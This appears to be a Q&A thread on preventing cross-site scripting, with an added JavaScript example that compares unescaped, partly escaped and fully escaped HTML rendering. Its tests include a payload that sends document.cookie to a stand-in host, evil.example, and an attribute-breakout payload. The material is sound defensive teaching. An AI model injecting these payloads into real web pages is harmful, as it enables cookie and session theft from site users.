The idea of XSS is that a hacker can inject their own custom JavaScript into a webpage. It's used to trick users into running their custom JavaScript code, and it is also used to steal cookies. If they steal cookies, they can steal the cookie data as well as, potentially, session data that has been linked with a cookie.
The main way is sanitizing any dynamic text that gets output to the browser. Make sure that it's safe: turn it into something harmless before you put it on the page. That means your HTML, your JavaScript, JSON, XML, anything else that you output. You want to make sure that it gets rendered harmless, especially data that comes from the URL or from forms.
Use the htmlspecialchars() function to convert the predefined characters "<" (less than) and ">" (greater than) to HTML entities, so that any script tag is rendered harmless.
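The output-encoding idea from the two answers above, as an added example that is not part of the original thread (names and payloads are my own). It is written in JavaScript rather than PHP so the same logic can be run in Node or a browser: `escapeHtml` does what htmlspecialchars() with ENT_QUOTES does, a vulnerable render is shown next to the hardened one, and `escapeAnglesOnly` shows why encoding only "<" and ">" still leaves an attribute-value injection open.

```javascript
// Added example, not code from the original thread. Function names,
// payloads and the containsInjection() check are constructed for illustration.
'use strict';

// The five characters that matter in HTML text and quoted-attribute contexts.
// "&" is included so that encoded output cannot be decoded twice.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

// Equivalent of PHP's htmlspecialchars($s, ENT_QUOTES): safe for HTML text
// and for values placed inside quoted attributes.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Encodes only "<" and ">", to demonstrate why that alone is not enough.
function escapeAnglesOnly(value) {
  return String(value).replace(/[<>]/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: a search term from the URL is concatenated straight into the page.
function renderVulnerable(q) {
  return `<p>Results for: ${q}</p><input name="q" value="${q}">`;
}

// Partially fixed: angle brackets encoded, but quotes are left alone.
function renderAnglesOnly(q) {
  const partial = escapeAnglesOnly(q);
  return `<p>Results for: ${partial}</p><input name="q" value="${partial}">`;
}

// Hardened: every dynamic value is encoded before it reaches the page.
function renderHardened(q) {
  const safe = escapeHtml(q);
  return `<p>Results for: ${safe}</p><input name="q" value="${safe}">`;
}

// Crude check used only in this example: does the markup contain a raw
// <script> tag, or a closed attribute followed by an injected event handler?
function containsInjection(html) {
  return /<script|"\s*onmouseover=/i.test(html);
}

// Constructed attacker inputs (cookie theft via script tag, and attribute breakout).
const SCRIPT_PAYLOAD =
  '<script>location="https://evil.example/?c="+document.cookie</script>';
const ATTR_PAYLOAD = '" onmouseover="alert(document.cookie)';

// Runs every render against both payloads and reports which ones are exploitable.
function summarize() {
  const renders = { renderVulnerable, renderAnglesOnly, renderHardened };
  const result = {};
  for (const [name, render] of Object.entries(renders)) {
    result[name] = {
      scriptTag: containsInjection(render(SCRIPT_PAYLOAD)),
      attribute: containsInjection(render(ATTR_PAYLOAD)),
    };
  }
  return result;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(summarize());
}
```

Running the block prints `true` for both payloads against `renderVulnerable`, `false`/`true` for `renderAnglesOnly` (the script tag is neutralised but the quote breaks out of the attribute), and `false`/`false` for `renderHardened`. The practical rule is the one the answers give: encode every dynamic value for the context it lands in, and use the full character set the encoder offers rather than just the angle brackets.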
You can deploy a web application firewall to secure your web services.